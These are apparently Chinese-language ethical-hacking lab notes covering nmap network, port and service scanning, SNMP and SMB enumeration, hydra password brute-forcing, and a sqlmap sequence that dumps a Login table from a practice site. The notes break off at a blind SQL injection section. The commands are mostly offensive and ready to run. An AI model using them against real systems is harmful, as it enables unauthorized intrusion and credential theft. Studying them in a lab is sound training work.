掃描:網路掃描找IP、主機掃描找服務TCP/UDP、服務掃描知道版本與狀態。
列舉:列表系統所有的細節資訊。
網路掃描:
1. 區網內,ARP掃描
>sudo nmap -sn 10.10.10.*
>sudo nmap -sn 10.10.10.* --packet-trace
2. 跨網域,TCP/UDP ping
>sudo nmap -sn scanme.nmap.org --packet-trace
ICMP echo request ( type=8/code=0 )
ICMP timestamp request ( type=13/code=0 )
主機掃描:
1. 標準只掃1000常見port
>sudo nmap 10.10.10.9
掃描特定port
>sudo nmap 10.10.10.9 -p 135,445,3389
掃描所有port
>sudo nmap 10.10.10.9 -p-
掃描UDP協定
>sudo nmap 10.10.10.16 -sU -p 53,137-139,161,1900,5353
掃描全網段 80 port
> sudo nmap -p 80 10.1.10.*
> sudo nmap -p 80 10.10.10.* -reason #顯示為何回報該狀態的原因
> sudo nmap -p 80 10.10.10.* --open #只顯示有開啟的 port
ICMP unreachable ( type=3/code=3 )
服務掃描:
1. 識別作業系統
> sudo nmap 10.10.10.16 -O
2. 識別服務(Version)
> sudo nmap 10.10.10.16 -sV
> sudo nmap 10.10.10.16 -sV -p 80
3. 檢測服務
> sudo nmap 10.10.10.16 -sVC -p445,3389
列舉服務:(找出個別服務的細節資訊)
1. 例,列舉網段中snmp服務
> sudo nmap -sU -p161 10.10.10.* --open
> sudo nmap -sU -sC -p161 10.10.10.16
利用snm檢查列出更詳細資訊
> snmp-check 10.10.10.16
利用NSE取得帳號列表並儲存
> sudo nmap -sU -p161 -script snmp-win32-users 10.10.10.16
> vim win32-users.txt
2. 列舉win
找出windows主機名稱
> nbtscan 10.10.10.1-254
對win主機進行列舉(因沒有帳密登入,取得資訊有限)
> enum4linux 10.10.10.16
利用帳號暴力破解密碼
> hydra -L win32-users.txt -P /usr/share/wordlists/nmap.lst smb://10.10.10.16
利用帳密重新列舉
> enum4linux -u martin -p apple -a 10.10.10.16
(法二)
> python3 -m pip install --upgrade impacket
> crackmapexec smb 10.10.10.16 -u martin -p apple --shares
(法三)
> net use \\10.10.10.16 * /u:martin
> net view \\10.10.10.16
檢測與攻擊網頁程式
1.用戶端參數竄改攻擊 viewprofile.aspx?id=4
2. MSSQL 隱碼攻擊
"右鍵/Inspect Element" => network tab / HTML => "reload
viewprofile.aspx?id=1 => Resend / edit and resend "/ new request / request headers / cookie / mscope=cdcdcd=
3. sqlmap
> sqlmap -u "http://10.10.10.19/moviescope/viewprofile.aspx?id=1" --cookie="mscope=cdcdcd="
> sqlmap -u "http://10.10.10.19/moviescope/viewprofile.aspx?id=1" --cookie="mscope=cdcdcd=" --dbs
> sqlmap -u "http://10.10.10.19/moviescope/viewprofile.aspx?id=1" --cookie="mscope=cdcdcd=" -D GoodShopping --tables
> sqlmap -u "http://10.10.10.19/moviescope/viewprofile.aspx?id=1" --cookie="mscope=cdcdcd=" -D GoodShopping -T Login --columns
> sqlmap -u "http://10.10.10.19/moviescope/viewprofile.aspx?id=1" --cookie="mscope=cdcdcd=" -D GoodShopping -T Login --columns --technique=B
The list of techniques with its letters is as follows:
B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries
> sqlmap -u "http://10.10.10.19/moviescope/viewprofile.aspx?id=1" --cookie="mscope=cdcdcd=" -D GoodShopping -T Login --dump --technique=B
3. 盲隱碼攻擊
1. DVWA Security / Impossible => low
2.